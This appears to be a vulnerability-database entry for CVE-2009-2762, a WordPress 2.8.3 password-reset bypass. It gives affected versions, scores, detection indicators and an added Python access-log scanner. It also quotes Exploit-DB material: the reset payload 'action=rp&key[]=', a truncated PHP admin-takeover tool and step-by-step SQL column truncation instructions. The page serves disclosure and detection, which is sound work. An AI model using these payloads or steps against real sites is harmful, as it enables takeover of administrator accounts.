CVE-2009-2762
Published 2009-08-13
Priority P259 · high · 7.5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available · EPSS 19.64% (97.1st percentile)
wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a password reset for the first user in the database, possibly the administrator, via a key[] array variable in a resetpass (aka rp) action, which bypasses a check that assumes that $key is not an array.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | < wordpress 2.8.3-2 (bookworm) | wordpress 2.8.3-2 (bookworm) |
| wordpress | wordpress | <= 2.8.3 | — |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
| wordpress | wordpress | >= 0 < 2.8.3-2 | 2.8.3-2 |
Detection & IOCs (extracted from sources)
- Detect GET requests to wp-login.php where the 'key' parameter is supplied as an array (key[]) combined with action=rp or action=resetpass — this is the exact exploit vector for CVE-2009-2762.
- Alert on HTTP requests to /wp-login.php containing the query string pattern 'action=rp&key[]=' or 'action=resetpass&key[]=', as this is the proof-of-concept payload.
- Monitor for POST requests to /wp-login.php?action=register with a user_login value of 'admin' followed by a large number of space characters (%20) — indicative of the SQL column truncation attack variant.
- Flag HTTP requests bearing the User-Agent string 'WordpressAdminTakeover', which is hardcoded in the published exploit tool for the SQL column truncation admin takeover.
- The password reset bypass (key[] array) only resets the password for the first user in the database, which is typically but not guaranteed to be the administrator.
- The SQL column truncation variant (the issue affecting 2.6.1) requires user registration to be enabled on the target WordPress installation.
- The core CVE-2009-2762 exploit requires no authentication and no prior steps — a single unauthenticated GET request is sufficient to trigger the password reset.
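The detection points above, turned into log-review logic as an added example (this code is not from the page or from any of the sources it indexes). It parses Apache/Nginx combined-format access-log lines, percent-decodes the query string so that `key%5B%5D` and `key[]` are treated alike, and classifies each request against the CVE-2009-2762 pattern and the two 2.6.1 takeover indicators. The log-line regex, the rule names, the 8-space threshold for the padded user_login check and the sample log lines are all assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/Nginx "combined" access-log line (assumed layout for this example).
# Request bodies are not in access logs, so check_register_body() below takes the
# url-encoded POST body as a WAF or reverse proxy with body logging would see it.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

RESET_ACTIONS = {"rp", "resetpass"}
# User-Agent hardcoded in the published 2.6.1 takeover tool (from the page's IOC list).
TAKEOVER_UA = "WordpressAdminTakeover"
# Constructed threshold: a legitimate username does not contain a run of spaces this long.
SPACE_RUN = re.compile(r" {8,}")


def parse_line(line):
    """Split a combined-format access-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(target):
    """(name, value) pairs of the query string. parse_qsl percent-decodes the names,
    so key%5B%5D and key[] both come back as 'key[]'."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify_request(entry):
    """Return (rule, severity) for one parsed log entry, or None if nothing matched."""
    if entry["ua"] == TAKEOVER_UA:
        return ("takeover-tool-user-agent", "high")
    if not urlsplit(entry["target"]).path.endswith("/wp-login.php"):
        return None
    params = query_params(entry["target"])
    actions = {v for n, v in params if n == "action"}
    # PHP turns key[] or key[anything] into an array in $_GET['key'].
    array_key = any(n == "key[]" or n.startswith("key[") for n, _ in params)
    if array_key and actions & RESET_ACTIONS:
        return ("cve-2009-2762-key-array-reset", "high")
    if array_key:
        # The wp-login.php excerpt quoted on this page sets $action = 'resetpass' whenever
        # $_GET['key'] is set, so an array key reaches the reset path even without an
        # explicit action parameter; flag it at lower confidence.
        return ("cve-2009-2762-key-array-implicit-reset", "medium")
    return None


def check_register_body(body):
    """True if a registration POST body carries a user_login padded with a long run of
    spaces (the SQL column truncation variant). `body` is the url-encoded form body."""
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name == "user_login" and SPACE_RUN.search(value):
            return True
    return False


def scan(lines):
    """Run classify_request over access-log lines; one finding dict per hit."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hit = classify_request(entry)
        if hit:
            findings.append({"host": entry["host"], "rule": hit[0],
                             "severity": hit[1], "target": entry["target"]})
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2009:12:00:00 +0000] "GET /wp-login.php?action=rp&key[]= HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Aug/2009:12:00:01 +0000] "GET /blog/wp-login.php?key%5B%5D=x HTTP/1.1" 200 1200 "-" "curl/7.19.7"',
    '203.0.113.7 - - [10/Aug/2009:12:00:02 +0000] "GET /wp-login.php?action=rp&key=abcdefghij0123456789 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Aug/2009:12:00:03 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 0 "-" "WordpressAdminTakeover"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['rule']:40} {f['host']} {f['target']}")
```

The third sample line (a scalar `key` with `action=rp`) is a normal password-reset link and produces no finding, which is the false-positive case a rule keyed only on `action=rp` would get wrong. Matching on decoded parameter names rather than the literal substring `key[]=` also catches the percent-encoded form.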
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | LOW | — |
Debian (vendor_debian · 2009 · CVSS 7.5)
CVE-2009-2762 [HIGH]: wordpress - wp-login.php in WordPress 2.8.3 and earlier allows remote attackers to force a p...
Scope: local
bookworm: resolved (fixed in 2.8.3-2)
bullseye: resolved (fixed in 2.8.3-2)
forky: resolved (fixed in 2.8.3-2)
sid: resolved (fixed in 2.8.3-2)
trixie: resolved (fixed in 2.8.3-2)
GHSA (ghsa_unreviewed · 2022-05-02)
GHSA-fxw5-28xr-82fm: wp-login [HIGH]
OSV (osv · 2009-08-13 · CVSS 7.5)
CVE-2009-2762: wp-login [HIGH]
No detection rules found.
Exploit-DB (exploitdb · 2009-08-11)
WordPress Core 2.8.3 - Remote Admin Reset Password
---
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
I. VULNERABILITY

```php
// wp-login.php, WordPress 2.8.3 (vulnerable version), excerpt as quoted in the advisory
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
    return new WP_Error('invalid_key', __('Invalid key'));
// ...[snip]....
// line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();
if ( isset($_GET['key']) )
    $action = 'resetpass';
// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
// ...[snip]....
// line 370:
    break;
case 'reset
```
Exploit-DB (exploitdb · 2008-09-10)
WordPress Core 2.6.1 - Admin Takeover (SQL Column Truncation)
---
```php
#!/usr/bin/php
# =5.2.1 you'll need to be as well, in case
# server is wp261_php520
# php-5.2.1/php createtables.php > wp261_php521
#
#-------------------------------------------------------------
$BLOG = $_SERVER['argv'][1];
echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n";
if(!$BLOG) {
    echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n";
    echo "    fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n";
    exit;
}
$UA = "WordpressAdminTakeover";
$MBOX="wp".`ps|md5sum|head -c 8`;
$EMAIL="[email protected]";
echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ?
    "[X] rainbow tables available\n" :
    "[!] rainbow tables not found - this will be really slow\n";
set_time_limit(0);
ini_set("max_execution_time",0);
```
Exploit-DB (exploitdb · 2008-09-07)
WordPress Core 2.6.1 - SQL Column Truncation
---
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends
1. go to url: server.com/wp-login.php?action=register
2. register as:
   login: admin x
   email: your email
   ^ admin[55 space chars]x
   now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0114.html
- http://core.trac.wordpress.org/changeset/11798
- http://secunia.com/advisories/36237
- http://wordpress.org/development/2009/08/2-8-4-security-release/
- http://www.exploit-db.com/exploits/9410
- http://www.securityfocus.com/bid/36014
- http://www.securitytracker.com/id?1022707
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52382
Published: 2009-08-13